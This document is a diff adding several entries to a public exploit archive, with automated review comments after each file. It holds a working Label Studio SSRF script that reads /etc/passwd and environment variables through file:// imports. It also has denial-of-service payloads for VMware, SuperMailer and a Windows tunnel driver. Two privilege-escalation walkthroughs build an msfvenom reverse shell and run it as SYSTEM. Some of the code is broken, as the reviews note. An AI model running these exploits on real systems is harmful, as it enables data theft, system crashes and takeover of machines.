+ #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
+ print("[+] Attempting to fetch: {}".format(filePath))
+ fetch_file(session, url, projectDetails["id"], filePath, writePath)
+
+ print("[+] Deleting Project.. {}".format(projectDetails["id"]))
+ delete_project(session, url, projectDetails["id"])
+ print("[+] Project Deleted")
+
+ print("[*] Finished executing exploit")
+
+
+# login, logs the user in
+def login(session, url, username, password, shouldRegister):
+
+ # hit the main page first to get the CSRF token set
+ r = session.get(url, verify=False)
+
+ r = session.post(
+ urljoin(url, "/user/login"),
+ data={
+ "email": username,
+ "password": password,
+ "csrfmiddlewaretoken": session.cookies["csrftoken"],
+ },
+ verify=False
+ )
+
+ if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
+ return
+ elif r.text.find("The email and password you entered") > 0 and shouldRegister:
+
+ print("[!] Account does not exist, registering...")
+ r = session.post(
+ urljoin(url, "/user/signup/"),
+ data={
+ "email": username,
+ "password": password,
+ "csrfmiddlewaretoken": session.cookies["csrftoken"],
+ 'allow_newsletters': False,
+ },
+ )
+ if r.status_code == 302:
+ # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
+ return
+
+ else:
+ print("[!] Error: Could not login, check the credentials and try again")
+ exit(1)
+
+
+# create_project creates a temporary project for exploiting the SSRF
+def create_project(session, url):
+
+
+
+ r = session.post(
+ urljoin(url, "/api/projects"),
+ data={
+ "title": "TPS Report Finder",
+ },
+ verify=False
+ )
+
+ if r.status_code == 200 or r.status_code == 201:
+ return r.json()
+ else:
+ print("[!] Error: Could not create project, check your credentials / permissions")
+ exit(1)
+
+def fetch_file(session, url, projectId, filePath, writePath):
+
+ # if scheme is empty prepend file://
+ parsedFilePath = urlparse(filePath)
+
+ if parsedFilePath.scheme == "":
+ filePath = "file://" + filePath
+
+ headers = {
+ 'Content-Type': 'application/x-www-form-urlencoded'
+ }
+
+ url = urljoin(url, "/api/projects/{}/import".format(projectId))
+ r = session.post(url,
+ data={
+ "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
+ },
+ headers=headers,
+ verify=False
+ )
+
+ if r.status_code == 201:
+ # file found! -- first grab the file path details
+ fileId = r.json()["file_upload_ids"][0]
+ r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
+ r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
+ print("[+] File found!")
+
+ # if user wants to write to disk, make it so
+ if writePath != None:
+ print("[+] Writing to {}".format(writePath))
+ # write the file to disk
+ with open(writePath, 'wb') as handle:
+ shutil.copyfileobj(r.raw, handle)
+ handle.close()
+ return
+ else:
+ print("==========================================================")
+ print(r.text)
+ print("==========================================================")
+ return
+ else:
+ print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
+ print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
+ return
+
+
+def delete_project(session, url, projectId):
+
+ url = urljoin(url, "/api/projects/{}".format(projectId))
+ r = session.delete(url, verify=False)
+ if r.status_code == 200 or r.status_code == 204:
+ return
+ else:
+ print( "[!] Error: Could not delete project, check your credentials / permissions")
+ exit(1)
+
+parser = argparse.ArgumentParser()
+
+parser.add_argument("--url", required=True, help="Label Studio URL")
+parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
+parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT")
+parser.add_argument("--username", required=False, help="Username for existing account (email)")
+parser.add_argument("--password", required=False, help="Password for existing account")
+parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
+)
+
+args = parser.parse_args()
+main(args.url, args.file, args.out, args.username, args.password, args.register)
\ No newline at end of file
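Review bot: The header calls this SSRF, but the usage examples and `fetch_file` only exercise local file reads through `file://`. The root cause appears only in the inline comment on the `"url": filePath` line (no restriction on the URL scheme), so it belongs in the header together with the first fixed release for CVE-2022-36551. In the code, TLS verification is disabled with `verify=False` and warnings are silenced globally with `requests.packages.urllib3.disable_warnings()`, `handle.close()` is redundant inside the `with` block, and `writePath != None` should be `writePath is not None`.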
diff --git a/exploits/windows/dos/51100.txt b/exploits/windows/dos/51100.txt
new file mode 100644
index 000000000..b64f4bf83
--- /dev/null
+++ b/exploits/windows/dos/51100.txt
@@ -0,0 +1,127 @@
+#Title: VMware Workstation 15 Pro - Denial of Service
+#Author: Milad Karimi
+#Date: 2022-10-17
+#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
+#Affected: VMware Workstation Pro/Player 15.x
+
+
+config.version = "8"
+virtualHW.version = "4"
+displayName = "credit's to Ex3ptionaL for find this vouln"
+annotation = "Live CD ISO http://www.irongeek.com"
+guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
+guestinfo.vmware.product.url = "http://www.millw0rm.com"
+guestinfo.vmware.product.short = "LCDI"
+guestinfo.vmware.product.version.major = "1"
+guestinfo.vmware.product.version.minor = "0"
+guestinfo.vmware.product.version.revision = "0"
+guestinfo.vmware.product.version.type = "release"
+guestinfo.vmware.product.class = "virtual machine"
+guestinfo.vmware.product.build = "1.0.0rc8-20051212"
+uuid.action = "create"
+guestOS = "winxppro"
+#####
+# Memory
+#####
+memsize = "20000000000000"
+# memsize = "300000000000000000000000000000"
+# memsize = "400000000000000000000"
+# memsize = "700000000000000000000000000000000000"
+#
+# Alternative larger memory allocations
+#####
+# USB
+#####
+usb.present = "TRUE"
+#####
+# Floppy
+#####
+floppy0.present = "FALSE"
+#####
+# IDE Storage
+#####
+ide1:0.present = "TRUE"
+#Edit line below to change ISO to boot from
+ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
+ide1:0.deviceType = "cdrom-image"
+ide1:0.startConnected = "TRUE"
+ide1:0.autodetect = "TRUE"
+#####
+# Network
+#####
+ethernet0.present = "TRUE"
+ethernet0.connectionType = "nat"
+# ethernet0.connectionType = "bridged"
+#
+# Switch these two to enable "Bridged" vs. "NAT"
+#####
+# Sound
+#####
+sound.present = "TRUE"
+sound.virtualDev = "es1371"
+sound.autoDetect = "TRUE"
+sound.fileName = "-1"
+#####
+# Misc.
+#
+# (normal) high
+priority.grabbed = "high"
+tools.syncTime = "TRUE"
+workingDir = "."
+#
+# (16) 32 64
+sched.mem.pShare.checkRate = "32"
+#
+# (32) 64 128
+sched.mem.pshare.scanRate = "64"
+#
+# Higher resolution lockout, adjust values to exceed 800x600
+svga.maxWidth = "8000000000000000000"
+svga.maxHeight = "6000000000000000000"
+#
+# (F) T
+isolation.tools.dnd.disable = "FALSE"
+#
+# (F) T
+isolation.tools.hgfs.disable = "FALSE"
+#
+# (F) T
+isolation.tools.copy.disable = "FALSE"
+#
+# (F) T
+isolation.tools.paste.disable = "FALSE"
+#
+# (T) F
+logging = "TRUE"
+#
+#
+# (F) T
+log.append = "FALSE"
+#
+# (3) number of older files kept
+log.keepOld = "1"
+#
+# (0) microseconds
+keyboard.typematicMinDelay = 100000000000000000
+uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
+uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
+ethernet0.addressType = "generated"
+ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
+ethernet0.generatedAddressOffset = "0"
+checkpoint.vmState = "live-cd-iso.vmss"
+
+tools.remindInstall = "TRUE"
+
+Exploit code()
+
+buffer = "A" * 118000000000000000
+payload = buffer
+try:
+ f=open("PoC.vmx","w")
+ print "[+] Creating %s evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
+
\ No newline at end of file
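Review bot: The entry never says which setting is the trigger: `memsize`, `svga.maxWidth`/`svga.maxHeight`, `ide1:0.fileName` and `keyboard.typematicMinDelay` all carry oversized values, and the header gives no crash symptom, fixed build or advisory reference, so a defender cannot tell what to look for in an untrusted .vmx file or whether a patched version exists. The trailing `Exploit code()` snippet is also inconsistent with the config above it: it writes a run of `A` characters to PoC.vmx rather than these settings, `"A" * 118000000000000000` cannot be allocated by the generating script, and the bare `except:` reports that as "File cannot be created". State which of the two is the reproducer, document the observed failure, and drop or correct the other.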
diff --git a/exploits/windows/dos/51102.txt b/exploits/windows/dos/51102.txt
new file mode 100644
index 000000000..aff0a0457
--- /dev/null
+++ b/exploits/windows/dos/51102.txt
@@ -0,0 +1,62 @@
+# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS
+# Exploit Author: Rafael Pedrero
+# Discovery Date: 2021-02-07
+# Vendor Homepage:
+https://int.supermailer.de/download_newsletter_software.htm
+# Software Link : https://int.supermailer.de/smintsw.zip /
+https://int.supermailer.de/smintsw_x64.zip
+# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
+# Tested on: Windows 7, 10
+
+CVSS v3: 3.3
+CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
+CWE: CWE-20
+
+Vulnerability description: A vulnerability in Newsletter Software
+SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
+cause a process crash resulting in a Denial of service (DoS) condition for
+the application on an affected system. The vulnerability exists due to
+insufficient validation of certain elements with a configuration file
+malformed. An attacker could exploit this vulnerability by sending a user a
+malicious SMB (configuration file) file through a link or email attachment
+and persuading the user to open the file with the affected software on the
+local system. A successful exploit could allow the attacker to cause the
+application to crash when trying to load the malicious file.
+
+Proof of concept:
+
+1.- Go to File -> Save program options...
+2.- Save the file (default extension *.smb)
+3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
+file
+
+Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA
+00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........
+000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.
+000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.
+00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.
+00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.
+00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.
+00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.
+00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.
+00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.
+00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........
+
+And save the file.
+
+4.- Go to File -> Restore program options...
+5.- The application "sm.exe" crash.
\ No newline at end of file
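Review bot: The title says "Buffer overflow DoS" while the body classifies the issue as CWE-20 and step 5 shows only that "sm.exe" crashes; nothing in the entry (exception code, faulting module, debugger output) supports a memory-corruption claim. Either add the crash evidence or retitle to match the CWE-20 and CVSS 3.3 availability-only assessment. The description's "malicious SMB (configuration file) file" should refer to the `.smb` options file so it is not confused with the SMB protocol, and step 3's "in somewhere" should name the field that the hex dump overwrites (offsets 0x0B to 0xB1) so the vendor can locate the missing length check.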
diff --git a/exploits/windows/dos/51114.c b/exploits/windows/dos/51114.c
new file mode 100644
index 000000000..e09fa465a
--- /dev/null
+++ b/exploits/windows/dos/51114.c
@@ -0,0 +1,48 @@
+// Exploit Title: Tunnel Interface Driver - Denial of Service
+// Date: 07/15/2022
+// Exploit Author: ExAllocatePool2
+// Vendor Homepage: https://www.microsoft.com/
+// Software Link: https://www.microsoft.com/en-us/software-download/windows10
+// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
+// Tested on: Microsoft Windows
+// GitHub Repository: https://github.com/Exploitables/MSRC-1
+
+#include
+#include
+
+#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
+
+int main(int argc, char** argv);
+
+int main(int argc, char** argv)
+{
+ HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
+ unsigned long long input_output = 0x4242424242424242;
+ unsigned long bytes_returned = 0x43434343;
+ unsigned char unused = 0;
+
+ SetConsoleTitleA("https://msrc.microsoft.com/");
+
+ printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
+
+ if (h_driver == (HANDLE)-1)
+ {
+ printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
+ unused = getchar();
+ return 1;
+ }
+ printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
+
+ printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
+ for (int i = 2; i > 0; i--)
+ {
+ Sleep(1000);
+ printf("\n[!] %d...", i);
+ }
+
+ DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
+
+ unused = getchar();
+ printf("\n[-] Exploit failed. The machine should have crashed.");
+ return 0;
+}
\ No newline at end of file
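Review bot: The two `#include` lines have lost their header names, so the file does not compile as committed, and the strings disagree about the bug class: the banner calls it a "Null Pointer Dereference" while the countdown message says "arbitrary read". Restore the includes, settle on one description, and add to the header block which driver binary is affected and whether a fix has shipped, since "Windows 10 Pro Version 21H2 (OS Build 19044.1288)" alone does not tell a defender which builds are exposed. Minor: `GetLastError()` returns an unsigned value but is printed with `%d`, the forward declaration of `main` is redundant, and `h_driver` is never closed.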
diff --git a/exploits/windows/local/51105.txt b/exploits/windows/local/51105.txt
new file mode 100644
index 000000000..033269e7d
--- /dev/null
+++ b/exploits/windows/local/51105.txt
@@ -0,0 +1,66 @@
+# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
+# Exploit Author: Jorge Manuel Lozano Gómez
+# Date: 2022-10-19
+# Vendor Homepage: https://www.panterasoft.com
+# Software Link: https://hdd-health.softonic.com
+# Version : 4.2.0.112
+# Tested on: Windows 11 64bit
+# CVE : N/A
+
+
+About Unquoted Service Path :
+==============================
+
+When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
+(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
+
+Description:
+==============================
+HDD Health installs a service with an unquoted service path.
+To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+# PoC
+===========
+
+1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
+2. The vulnerable service would show up.
+3. Check the service permissions by typing [ sc qc "HDDHealth" ]
+4. The command would return..
+
+ C:\>sc qc "HDDHealth"
+ [SC] QueryServiceConfig SUCCESS
+
+
+ SERVICE_NAME: HDDHealth
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ ISPLAY_NAME : HDDHealth
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+5. This concludes that the service is running as SYSTEM.
+6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
+7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
+8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
+9. Start a listener.
+9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
+9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
+10. Got shell.
+
+
+During my testing :
+
+Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
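Review bot: Steps 6 to 8 do not demonstrate the unquoted-path issue the title claims: they place a file named HDDHealthService.exe into "C:\Program Files (x86)\HDD Health", which is the service's own binary location, so what is shown is replacement of the service binary and depends entirely on the "write permissions" assumed in step 7. The entry includes no ACL output (for example from `icacls`) showing that a non-administrator can write there, so the privilege boundary crossed is not established. Add that evidence and state the remediation, which is to quote the service's binary path in its configuration and keep the install directory writable by administrators only. Also fix the step numbering (9 appears twice) and the truncated `ISPLAY_NAME` field in the pasted `sc qc` output.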
diff --git a/exploits/windows/local/51106.txt b/exploits/windows/local/51106.txt
new file mode 100644
index 000000000..04db1cce0
--- /dev/null
+++ b/exploits/windows/local/51106.txt
@@ -0,0 +1,66 @@
+# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
+# Exploit Author: Jorge Manuel Lozano Gómez
+# Date: 2022-10-20
+# Vendor Homepage: https://www1.sugarsync.com
+# Software Link: https://www1.sugarsync.com/apps/windows/
+# Version : 4.1.3
+# Tested on: Windows 11 64bit
+# CVE : N/A
+
+
+About Unquoted Service Path :
+==============================
+
+When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
+(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
+
+Description:
+==============================
+SugarSync installs a service with an unquoted service path.
+To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+# PoC
+===========
+
+1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
+2. The vulnerable service would show up.
+3. Check the service permissions by typing [ sc qc "SugarSync Service" ]
+4. The command would return..
+
+ C:\>sc qc "SugarSync Service"
+ [SC] QueryServiceConfig SUCCESS
+
+
+ SERVICE_NAME: SugarSync Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ ISPLAY_NAME : SugarSync Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+5. This concludes that the service is running as SYSTEM.
+6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe.
+7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory.
+8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
+9. Start a listener.
+9. Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
+9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
+10. Got shell.
+
+
+During my testing :
+
+Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
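Review bot: In the `sc qc` output the only space in BINARY_PATH_NAME is inside `Program Files (x86)`; the vendor directory `SugarSync` contains none, so the exposure hinges on permissions of directories outside the product, which the entry never shows, while step 7 checks a directory that plays no part in the path ambiguity. The "About" and "Description" text, the duplicated step 9 and the truncated `ISPLAY_NAME` line are identical to the HDD Health entry, which suggests a template rather than captured output. Paste the real command output and say what was actually verified on the test machine.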
diff --git a/files_exploits.csv b/files_exploits.csv
index 403ca739b..d80561a27 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1831,6 +1831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,,
41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,,
41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,,
+51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,,
47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
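Review bot: The added row writes the version as "v11.3", while the neighbouring rows give bare versions ("Personify360 7.5.2/7.6.1", "Roxy Fileman 1.4.5"); drop the "v" for consistency. Its tags column is also empty although this is a reflected XSS entry and other rows in this file carry the "Cross-Site Scripting (XSS)" tag, so tag-based searches will miss it.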
@@ -3851,6 +3852,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,,2020-05-25,2020-05-25,1,CVE-2017-15889,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,,2018-01-15,2018-01-15,1,,,,,,
16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware,,2011-02-02,2011-02-02,1,CVE-2011-0354;OSVDB-68309,,,,,
+51107,exploits/hardware/remote/51107.txt,"Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access",2023-03-28,dsclee1,remote,hardware,,2023-03-28,2023-03-28,0,CVE-2022-37255,,,,,
44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
@@ -5824,6 +5826,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080,2015-06-12,2016-10-10,1,CVE-2015-7347;CVE-2015-7346;OSVDB-123320;OSVDB-123319;OSVDB-123318,,,,http://www.exploit-db.comZCMS_1.1.zip,
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"XML External Entity (XXE)",,,,
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"Server-Side Request Forgery (SSRF)",,,,
+51112,exploits/jsp/webapps/51112.txt,"ZKTeco ZEM/ZMM 8.88 - Missing Authentication",2023-03-28,"RedTeam Pentesting GmbH",webapps,jsp,,2023-03-28,2023-03-28,0,CVE-2022-42953,,,,,
40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp,,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
@@ -10732,6 +10735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6577/info
22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6575/info
22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6578/info
+51117,exploits/multiple/remote/51117.txt,"Hashicorp Consul v1.0 - Remote Command Execution (RCE)",2023-03-28,GatoGamer1155,remote,multiple,,2023-03-28,2023-03-28,0,,,,,,
35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple,,2010-12-10,2014-10-28,1,,,,,,https://www.securityfocus.com/bid/45340/info
23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple,,2004-01-26,2016-09-06,1,CVE-2004-2113;OSVDB-3754,,,,,https://www.securityfocus.com/bid/9491/info
